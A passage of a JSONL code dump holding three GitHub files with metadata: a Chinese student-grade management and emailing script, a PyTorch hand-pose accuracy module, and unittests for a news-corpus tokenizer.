+{"seq_id": "6177776579", "text": "from email import encoders\r\nfrom email.header import Header\r\nfrom email.mime.text import MIMEText\r\nfrom email.utils import parseaddr, formataddr\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.base import MIMEBase\r\nimport smtplib\r\nfrom openpyxl import load_workbook,Workbook\r\nimport subprocess as sb\r\nfrom openpyxl.styles import PatternFill, Alignment, Side, Border\r\nimport csv\r\nimport zipfile\r\nimport time\r\nimport os\r\nimport pandas as pd\r\nfrom pandas import DataFrame,Series\r\n#分组平均聚合\r\n####数据可视化\r\n##设置中文字体\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.pyplot import plot,savefig\r\nimport smtplib\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.multipart import MIMEMultipart\r\n#matplotlib.use('Agg')\r\n##仿宋字体设置\r\nplt.rcParams['font.family'] = ['FangSong']\r\npaths ='./成绩分析清洗.csv'\r\ntarget ='./学生个人成绩/'\r\n\r\ndef mkdir(path):\r\n folder = os.path.exists(path)\r\n if not folder: \r\n os.makedirs(path) \r\n else:\r\n print(\"--- There is this folder! ---\")\r\n##参数预置\r\ntar_list =[]\r\ntest_list =[]\r\nsums =0\r\n##压缩文件模块\r\nclass zip:\r\n def get_zip(self,files,zip_name):\r\n zp=zipfile.ZipFile(zip_name,'w', zipfile.ZIP_DEFLATED)\r\n for file in files:\r\n zp.write(file)\r\n zp.close()\r\n time.sleep(1)\r\n\r\nlest =os.listdir('./')\r\nprint(lest)\r\npath1 =input(\"选择要打开的表格名称(输入序号): \")\r\npath1 =lest[int(path1)-1]\r\npath ='./'+path1\r\ndef open_f():\r\n lest =os.listdir('./')\r\n print(lest)\r\n path1 =input(\"选择要打开的表格名称(输入序号): \")\r\n path1 =lest[int(path1)-1]\r\n path ='./'+path1\r\n return path\r\n\r\ndef menu_all():\r\n print('''\r\n ********菜单********\r\n 1.进入学生信息系统\r\n 2.进入教师成绩系统\r\n 0.退出\r\n ''')\r\ndef menu2():\r\n print('''\r\n ********成绩系统********\r\n 1.学生成绩访问(查询,增加,删除,修改)\r\n 2.学生成绩分析\r\n ''')\r\ndef menu2_add():\r\n print('''\r\n 1.学生成绩查询\r\n 2.学生成绩增加\r\n 3.学生成绩删除\r\n 4.学生成绩修改\r\n ''') \r\n\r\ndef api_c():\r\n #调用c程序用以生成 xxx.txt\r\n sb.run([\"info.exe\"])\r\n\r\ndef visit():\r\n menu2_add()\r\n choice =input(\"请输入您的选择:\")\r\n\r\n if(choice =='1'):#学生成绩查询\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n name =input(\"请输入要查询的学生姓名: \")\r\n k =search(name)\r\n for cell in ws[2]:\r\n print(\"%s \"%cell.value,end =\"\")\r\n print(\"\\n\")\r\n for row in ws.iter_rows(min_row =k,max_row =k,min_col=1,max_col=6,values_only= True):\r\n print(row)\r\n \r\n elif(choice =='2'):#学生成绩增加\r\n print('''\r\n 1.横向增加学生成绩\r\n 2.纵向增加科目成绩\r\n ''')\r\n choices =input(\"请输入您的选择: \")\r\n if(choices =='1'):\r\n scores_x()\r\n elif(choices =='2'):\r\n scores_y()\r\n\r\n elif(choice =='3'):#学生成绩删除\r\n print('''\r\n 1.横向删除学生的所有成绩信息\r\n 2.纵向删除课程的所有成绩信息\r\n ''')\r\n choices =input(\"请输入您的选择: \")\r\n if(choices =='1'):\r\n del_X()\r\n elif(choices =='2'):\r\n del_y()\r\n \r\n elif(choice =='4'):#学生成绩修改\r\n name =input(\"请输入待修改学生姓名: \")\r\n lesson =input(\"请输入待修改科目: \")\r\n score =input(\"请输入待修改成绩数值: \")\r\n vary(name,lesson,score)\r\n\r\ndef search(name):\r\n k =1\r\n wb = load_workbook(path)\r\n ws = wb.active\r\n for cell in ws['C']:\r\n if(cell.value !=name):\r\n k =k+1\r\n else:\r\n break\r\n return k\r\n\r\ndef scores_x():\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n adds =input(\"请依次输入以下信息以逗号间隔 例如 班级,学号,姓名,语文,数学,英语 :\")\r\n lists =adds.split(\",\")\r\n ws.append(lists)\r\n rows =ws.max_row\r\n for cell in ws[rows]:\r\n cell.alignment = align\r\n wb.save(path)\r\n\r\ndef scores_y():\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n cols =ws.max_column\r\n cols 
=['A','B','C','D','E','F','G','H'][cols-1]\r\n rows =ws.max_row\r\n lesson =input(\"输入要增加的科目:\")\r\n ws[cols+'2'] =lesson\r\n for i in range(3,rows+1):\r\n print(ws['C'+str(i)].value)\r\n score =input(\"输入该同学\"+lesson+'成绩: ' )\r\n ws[cols+str(i)] =score\r\n ws[cols+str(i)].alignment = align\r\n print(\"\\n\")\r\n wb.save(path)\r\n\r\ndef del_X():\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n adds =input(\"请输入要删除的学生姓名: \")\r\n k =search(adds)\r\n ws.delete_rows(k) #删除从第一行开始算的2行内容\r\n wb.save(path)\r\n\r\ndef del_y():\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n adds =input(\"请输入要删除的课程名称: \")\r\n k =4\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n for i in ['D','E','F','G','H']:\r\n if(ws[i+str(2)].value !=adds):\r\n k =k+1\r\n else:\r\n break\r\n ws.delete_cols(k) #删除从第一列开始算的2列内容\r\n wb.save(path)\r\n\r\ndef vary(name,lesson,score):\r\n rows =search(name)\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n k =4\r\n for i in ['D','E','F','G','H']:\r\n if(ws[i+str(2)].value !=lesson):\r\n k =k+1\r\n else:\r\n break\r\n cols =['A','B','C','D','E','F','G','H'][k-1]\r\n ws[cols+str(rows)] =score\r\n ws[cols+str(rows)].alignment = align\r\n wb.save(path)\r\n\r\n\r\n\r\ndef analyze_fun(ws1,ws2):#成绩分析\r\n fo =open('期中期末成绩汇总表.csv','w',encoding= 'utf-8')\r\n lists =[]\r\n lists.append(['班级','姓名','期中语文','期中数学','期中英语','期末语文','期末数学','期末英语','\\n'])\r\n lists =\",\".join(lists[0])\r\n fo.write(lists)\r\n str1 =''\r\n lists =[]\r\n for row in ws1.iter_rows(min_row =3,max_row =782,min_col =2,max_col =6,values_only =True):\r\n for i in row:\r\n if i ==row[-1]:\r\n str1 =str1+str(i)\r\n else:\r\n str1 =str1+str(i)+','\r\n lists.append(str1)\r\n str1 =''\r\n x =0\r\n for row in ws2.iter_rows(min_row =3,max_row =782,min_col =4,max_col =6,values_only =True):\r\n for i in row:\r\n if i ==row[-1]:\r\n lists[x] =lists[x]+','+str(i)+'\\n'\r\n else:\r\n lists[x] =lists[x]+','+str(i)\r\n x =x+1\r\n for i in lists:\r\n fo.write(i)\r\n fo.close()\r\n\r\ndef analyze_clean():\r\n read_csv =pd.read_csv('./期中期末成绩汇总表.csv',encoding ='utf-8')\r\n read_csv =read_csv.drop('Unnamed: 8',axis=1)\r\n #查找缺失值\r\n read_csv.isna()\r\n #删除缺失值\r\n read_csv =read_csv.dropna()\r\n #can't del repetitive value\r\n analy =read_csv.describe()\r\n analy.to_csv('./成绩描述性统计数据.csv',encoding ='utf-8')\r\n #描述性统计分析后没有异常值存在,为简化不必清洗异常值\r\n #清洗后数据存储\r\n read_csv.to_csv('./成绩分析清洗.csv',encoding ='utf-8')\r\n\r\ndef analyze_class():\r\n grade_df =pd.read_csv('./成绩分析清洗.csv',encoding ='utf-8')\r\n grade_df\r\n #平均成绩聚合\r\n grade_mid_chinese =grade_df.groupby('班级')['期中语文'].mean()\r\n grade_last_chinese =grade_df.groupby('班级')['期末语文'].mean()\r\n grade_mid_math =grade_df.groupby('班级')['期中数学'].mean()\r\n grade_last_math =grade_df.groupby('班级')['期末数学'].mean()\r\n grade_mid_eng =grade_df.groupby('班级')['期中英语'].mean()\r\n grade_last_eng =grade_df.groupby('班级')['期末英语'].mean()\r\n grade_df2 =DataFrame({'期中语文':grade_mid_chinese,'期末语文':grade_last_chinese,'期中数学':grade_mid_math,'期末数学':grade_last_math,'期中英语':grade_mid_eng,'期末英语':grade_last_eng})\r\n grade_df2.to_csv('./班级分组平均成绩聚合.csv',encoding ='utf-8')\r\n #成绩标差聚合\r\n grades_mid_chinese =grade_df.groupby('班级')['期中语文'].std()\r\n grades_last_chinese =grade_df.groupby('班级')['期末语文'].std()\r\n grades_mid_math =grade_df.groupby('班级')['期中数学'].std()\r\n grades_last_math =grade_df.groupby('班级')['期末数学'].std()\r\n grades_mid_eng =grade_df.groupby('班级')['期中英语'].std()\r\n grades_last_eng =grade_df.groupby('班级')['期末英语'].std()\r\n grades_df2 
=DataFrame({'期中语文':grades_mid_chinese,'期末语文':grades_last_chinese,'期中数学':grades_mid_math,'期末数学':grades_last_math,'期中英语':grades_mid_eng,'期末英语':grades_last_eng})\r\n grades_df2.to_csv('./班级分组标差成绩聚合.csv',encoding ='utf-8')\r\n \r\n #画布生成\r\n plt.figure(figsize =(15,15))\r\n fun_read =pd.read_csv('./班级分组平均成绩聚合.csv',encoding ='utf-8')\r\n xclass =fun_read['班级']\r\n ychinese =fun_read[['期中语文','期末语文']]\r\n plt.plot(xclass,ychinese,linewidth =3,marker ='o',markersize =10,markerfacecolor ='w')\r\n #图表标题及字体大小\r\n plt.title('各班语文平均成绩折线图',fontsize =20)\r\n #坐标轴刻度字体\r\n plt.xticks(fontsize =15,rotation =90)\r\n plt.yticks(fontsize =15)\r\n plt.xlabel('班级',fontsize =15)\r\n plt.ylabel('成绩(分)',fontsize =15)\r\n plt.legend(['期中语文','期末语文'])\r\n savefig('./各班语文平均成绩折线图.png')\r\n plt.close()\r\n\r\n \r\n funs_read =pd.read_csv('./班级分组标差成绩聚合.csv',encoding ='utf-8')\r\n plt.figure(figsize =(15,15))\r\n ####柱状图基本设计\r\n # 设置 x/y 坐标值\r\n x =funs_read['班级']\r\n y =funs_read['期中语文']\r\n plt.plot(x, y, color='dodgerblue')\r\n plt.title('年级班级语文成绩标差分布',fontdict ={\r\n 'family': 'FangSong', 'color': 'black', 'weight': 'bold', 'size': 25})\r\n plt.xticks(fontsize=18,rotation =90)\r\n plt.yticks(fontsize=12)\r\n plt.xlabel('班级', fontsize=15)\r\n plt.ylabel('标差稳定性', fontsize=17)\r\n plt.bar(x, height=y, color='darkorange',width=0.6,alpha=0.6)\r\n plt.legend(['稳定性变化','稳定性分布'])\r\n savefig('./各班语文标差成绩图.png')\r\n plt.close()\r\n #for a,b in zip(x,y):\r\n #plt.text(a, b, b, ha='center', va='bottom', fontsize=12)\r\ndef analy_stu(paths):\r\n sums =0\r\n with open(paths,'r',encoding ='utf-8',newline =\"\") as csv_file:\r\n csvs_reader =csv.DictReader(csv_file)\r\n headers =csvs_reader.fieldnames\r\n for row in csvs_reader:\r\n target_file =row['姓名']+'.csv'\r\n fil =target+row['姓名']+'/'\r\n mkdir(fil)\r\n test_list.append(fil)\r\n target_file =fil+target_file\r\n tar_list.append(target_file)\r\n sums =sums+1\r\n with open(target_file,'w',encoding ='utf-8',newline =\"\") as csv_f:\r\n csv_w =csv.DictWriter(csv_f,headers)\r\n csv_w.writeheader()\r\n csv_w.writerow(row)\r\n i=0\r\n for tar_file in tar_list[0:1]:###########\r\n f =pd.read_csv(tar_file,encoding ='utf-8')\r\n plt.figure(figsize =(15,15))\r\n xclass =f['姓名']\r\n ychinese =f[['期中语文','期末语文']]\r\n plt.plot(xclass,ychinese,linewidth =3,marker ='o',markersize =10,markerfacecolor ='w')\r\n #图表标题及字体大小\r\n plt.title('语文成绩折线图',fontsize =20)\r\n #坐标轴刻度字体\r\n plt.xticks(fontsize =15)\r\n plt.yticks(fontsize =15)\r\n plt.xlabel('姓名',fontsize =15)\r\n plt.ylabel('成绩(分)',fontsize =15)\r\n plt.legend(['期中语文','期末语文'])\r\n savefig(test_list[i]+'语文成绩折线图.png')\r\n i =i+1\r\n plt.close()\r\n ##压缩模块\r\n i =0\r\n name =[]\r\n\r\n lists =[]\r\n lest =[]\r\n for fo in test_list[0:1]:#########\r\n lists =os.listdir(fo)\r\n for x in lists:\r\n path1 =fo+lists[0]\r\n lest.append(path1)\r\n path2 =fo+lists[1]\r\n lest.append(path2)\r\n z =zip()\r\n zip_file =fo+'成绩.zip'\r\n name.append(zip_file)\r\n z.get_zip(lest,zip_file)\r\n time.sleep(2)\r\n i =i+1\r\n sums =sums-1\r\n lest =[]\r\n lists =[]\r\n print(\"{}个文件已完成,剩余{}个预计需要{}分钟\".format(i,sums,sums*3/60))\r\n\r\ndef maile(aim_account):\r\n account = input('请输入邮箱账户:')\r\n token = input('请输入邮箱授权码:')\r\n # 设置邮箱服务器,端口\r\n smtp = smtplib.SMTP_SSL('smtp.qq.com', 465)\r\n # 登录qq邮箱\r\n smtp.login(account, token)\r\n content ='本学期成绩已整理完成,现在对你的成绩单独发送'\r\n content =content+'详情见附件内容'\r\n email_content = MIMEText(content, 'plain', 'utf-8')\r\n#for tar in name:\r\n #passhttp://localhost:8888/notebooks/Untitled3.ipynb#\r\n tar 
='./学生个人成绩/高健玮/成绩.zip'#########\r\n f =open(tar,'rb')\r\n # 设置附件的MIME和文件名,这里是rar类型:\r\n fil = MIMEBase('zip', 'zip', filename='成绩单.zip')\r\n # 加上必要的头信息:\r\n fil.add_header('Content-Disposition', 'attachment', filename='成绩单')\r\n fil.add_header('Content-ID', '<0>')\r\n fil.add_header('X-Attachment-Id', '0')\r\n # 把附件的内容读进来:\r\n fil.set_payload(f.read())\r\n # 用Base64编码\r\n encoders.encode_base64(fil)\r\n #添加到MIMEMultipart\r\n msg = MIMEMultipart()\r\n msg.attach(fil)\r\n f.close()\r\n msg.attach(email_content)\r\n # 设置发送者信息\r\n msg['From'] = '贾'\r\n msg['To'] = '各位同事们' \r\n msg['Subject'] = '测试'\r\n # 发送邮件\r\n smtp.sendmail(account, aim_account, msg.as_string()) \r\n # 关闭邮箱服务\r\n smtp.quit() \r\n\r\nchoice =5###学生成绩管理后期用openpyxl改进\r\nalign = Alignment(horizontal='right')\r\nwhile(choice !='0'):\r\n menu_all()\r\n choice =input(\"请输入您的选择:\")\r\n \r\n if(choice =='2'):#教师端操作\r\n menu2()\r\n choice =input('请输入您的选择:')\r\n\r\n if(choice =='1'):#学生成绩访问\r\n visit()\r\n \r\n elif(choice =='2'):#学生成绩分析\r\n print('''\r\n 1.班级总体分析\r\n 2.单位学生分析\r\n ''')\r\n choice =input(\"请输入你的选择: \")\r\n if(choice =='1'):#总体分析\r\n print(\"请打开两个xlsx表格\")\r\n #打开 期中、期末两个xlsx表格\r\n path1 =open_f()\r\n wb1 =load_workbook(path1)\r\n ws1 =wb1.active\r\n path2 =open_f()\r\n wb2 =load_workbook(path2)\r\n ws2 =wb2.active\r\n #用函数封装具体分析\r\n analyze_fun(ws1,ws2)\r\n analyze_clean()\r\n analyze_class()\r\n \r\n \r\n elif(choice =='2'):#单位学生分析\r\n analy_stu(paths)\r\n aim_account =input('请输入要发送的目标邮箱: ')\r\n maile(aim_account)\r\n \r\n elif(choice =='1'):\r\n api_c()\r\n\r\n\r\n\r\n menu_all()\r\n choice =input(\"请输入您的选择:\") \r\n", "repo_name": "JhonDavies/grade-two-design", "sub_path": "课程设计项目技术部分.py", "file_name": "课程设计项目技术部分.py", "file_ext": "py", "file_size_in_byte": 15490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 28, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 35, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 45, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 45, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 49, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 51, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 57, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 87, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 94, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 134, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 144, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 155, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 171, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 179, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 183, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 195, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 239, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 253, "usage_type": "call"}, {"api_name": "pandas.DataFrame", 
"line_number": 262, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 275, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 275, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 276, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 285, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 286, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 286, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 287, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 287, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 289, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 293, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 298, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 303, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 303, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "csv.DictReader", "line_number": 314, "usage_type": 
"call"}, {"api_name": "csv.DictWriter", "line_number": 325, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 330, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 331, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 336, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 338, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 338, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 339, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 340, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 341, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 341, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 342, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 345, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 353, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 363, "usage_type": "call"}, {"api_name": "smtplib.SMTP_SSL", "line_number": 374, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 379, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 385, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 393, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 393, "usage_type": "name"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 395, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 409, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 431, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 434, "usage_type": "call"}]}
+{"seq_id": "29831904298", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch.nn as nn\nimport torch\nimport numpy as np\n\n\nclass Accuracy(nn.Module):\n def __init__(self,pca_w,pca_b,cube,jointNum,batch_size,device):\n super(Accuracy, self).__init__()\n #self.criterion = nn.MSELoss()\n #self.criterion = nn.MSELoss(reduction='elementwise_mean')\n \n self.pca_w=pca_w\n self.pca_b=pca_b\n self.cube=cube\n \n self.com3d=np.zeros((batch_size,3))\n self.joints3d_gt=np.zeros((batch_size,jointNum*3))\n \n self.batch_size=batch_size\n \n self.device=device\n \n \n\n def _forward(self, output_embed, target,com3d):\n \n output_recon=torch.mm(output_embed,self.pca_w)+self.pca_b\n \n com3d_tile=np.tile(com3d,(1,21))\n com3d_tile=torch.FloatTensor(com3d_tile) \n com3d_tile= com3d_tile.to(self.device) \n output_recon=output_recon*(self.cube[2]/2.)+com3d_tile\n \n error_bag=[]\n for k in range(self.batch_size):\n error_torch1=(target[k]-output_recon[k])**2\n error_torch2=torch.sqrt(torch.sum(error_torch1.view(21*1,3),dim=1)) \n error=torch.sum(error_torch2)/(21*1)\n error_bag.append(error.item())\n \n #loss=self.criterion(output,target)\n #error=self.calculate_error()\n return error_bag\n #return error\n\n \n ", "repo_name": "baeckgoo/ir-hand", "sub_path": "loss/accuracy.py", "file_name": "accuracy.py", "file_ext": "py", "file_size_in_byte": 1547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "7059039490", "text": "import os\nimport unittest\n\nfrom lxml import etree\n\nfrom src.preprocess.tokenizer import get_root, read_aquaint, read_aquaint2, read_tac, get_date, tokenizer, write_output, \\\n read_by_corpus_type\n\nparser = etree.XMLParser(resolve_entities=False, no_network=True, recover=True)\n\nmaster_headline = \"\\\"One-in-100-year flood event\\\" devastates Western Australia\"\nmaster_body = [\n \"Test, Test (WIKINEWS) _ Aerial evacuations took place and food was airlifted in yesterday after a \"\n \"devastating flood Western Australia emergency services minister Stephen Dawson called the 'worst in a \"\n \"century' isolated communities in the Kimberley.\",\n 'Flooding began last week after heavy rain from Tropical Cyclone Ellie swelled local rivers, bolstered by '\n 'La Niña. Notably, the Fitzroy River broke a 2002 record of 13.95 meters (45.8 ft), reaching a water '\n 'level of 15.81 meters (51.9 ft) on Wednesday, according to a Bureau of Meteorology spokesperson.',\n 'Authorities estimate it could take months']\ntemp = \"temp.txt\"\n\n\nclass TestTokenizer(unittest.TestCase):\n def test_get_root(self):\n root = get_root(\"../snip/tac.sgm\")\n headline = root.find(\"DOC\").find(\"BODY\").find(\"HEADLINE\").text.strip().replace('\\n', ' ')\n self.assertEqual(headline, master_headline)\n\n def test_read_aquaint(self):\n root = get_root(\"../snip/aquaint.xml\")\n headline, body = read_aquaint(root, \"APW19980602.0004\")\n self.assertEqual(headline, master_headline)\n self.assertEqual(body, master_body)\n\n def test_read_aquaint2(self):\n root = get_root(\"../snip/aquaint2.xml\")\n headline, body = read_aquaint2(root, \"APW_ENG_19980602.0002\")\n self.assertEqual(headline, master_headline)\n self.assertEqual(body, master_body)\n\n def test_read_tac(self):\n root = get_root(\"../snip/tac.sgm\")\n headline, body = read_tac(root)\n self.assertEqual(headline, master_headline)\n self.assertEqual(body, master_body)\n\n def test_get_data(self):\n self.assertEqual(get_date(\"APW19980602.1383\"), \"19980602\")\n self.assertEqual(get_date(\"APW_ENG_20041007.0256\"), \"20041007\")\n self.assertEqual(get_date(\"AFP_ENG_20061002.0523\"), \"20061002\")\n\n def test_tokenizer(self):\n result = tokenizer(\"Authorities estimate it could take months\")\n self.assertEqual(len(result), 6)\n self.assertEqual(result[2], \"it\")\n\n def check_two_txt(self):\n with open(temp) as test, open('../snip/gold.txt') as gold:\n for line1, line2 in zip(test, gold):\n self.assertEqual(line1, line2)\n os.remove(temp)\n\n def test_write_output(self):\n output = open(temp, \"w+\")\n date = \"19980602\"\n write_output(output, 1, date, master_headline, master_body)\n self.check_two_txt()\n\n def test_read_by_corpus_type(self):\n read_by_corpus_type(\"../snip/aquaint.xml\", \"APW19980602.0004\", 1, 1, temp)\n self.check_two_txt()\n read_by_corpus_type(\"../snip/aquaint2.xml\", \"APW_ENG_19980602.0002\", 1, 2, temp)\n self.check_two_txt()\n read_by_corpus_type(\"../snip/tac.sgm\", \"AFP_ENG_19980602.0149\", 1, 3, temp)\n self.check_two_txt()\n\n\nif __name__ == '__main__':\n unittest.main()", "repo_name": "LING-575-Summarization/Summarization", "sub_path": "src/tests/tokenizer_test.py", "file_name": "tokenizer_test.py", "file_ext": "py", "file_size_in_byte": 3267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "lxml.etree.XMLParser", "line_number": 9, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 9, 
"usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 23, "usage_type": "attribute"}, {"api_name": "src.preprocess.tokenizer.get_root", "line_number": 25, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.get_root", "line_number": 30, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.read_aquaint", "line_number": 31, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.get_root", "line_number": 36, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.read_aquaint2", "line_number": 37, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.get_root", "line_number": 42, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.read_tac", "line_number": 43, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.get_date", "line_number": 48, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.get_date", "line_number": 49, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.get_date", "line_number": 50, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.tokenizer", "line_number": 53, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 61, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.write_output", "line_number": 66, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.read_by_corpus_type", "line_number": 70, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.read_by_corpus_type", "line_number": 72, 